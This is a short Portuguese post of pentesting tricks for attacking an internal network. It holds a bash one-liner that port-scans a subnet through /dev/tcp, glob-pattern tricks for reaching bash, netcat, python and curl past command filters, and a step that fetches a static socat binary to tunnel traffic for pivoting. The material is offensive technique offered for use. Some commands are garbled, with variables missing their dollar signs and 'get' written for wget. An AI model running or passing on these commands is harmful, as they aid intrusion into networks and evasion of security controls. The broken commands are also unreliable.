Tricks Pentestes

Olá vou passar alguns tricks que uso para varrer um host interno para depois fazer um pivonting

Varrer principais portas: Troque o ip do host que queira varrer

route|awk '{print 1}'|grep [[:digit:]] || ip route list |awk '{print 1}'|grep [[:digit:]];echo -e "443\n80\n22\n21\n3306" | while read port; do echo "[Port] port";echo 192.168.1.{0..255} | tr ' ' '\n' | xargs -P200 -I@ timeout 2 bash -c '2>- </dev/tcp/@/'port' && echo "[OPEN] @:"'$port;done

Bypass em permissões do bash

/bin/b??? -p || /bi?/b??? -p = bash
/bin/ne?c?t || /bi?/ne?c?t = nc
/bin/p?t?o?3 || /bi?/p?t?o?3 = python3
/bin/p?t?o?2 || /bi?/p?t?o?2 = python2
/bin/c??l || /bi?/c??l = curl
/bin/w??t || /bi?/w??t = get

Usando socat para tunelar e futuramente pivotear

wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat;chmod +x socat ;./socat -h

Uso= ./socat tcp-l:7878,fork,reuseaddr tcp:172.16.0.147:80 &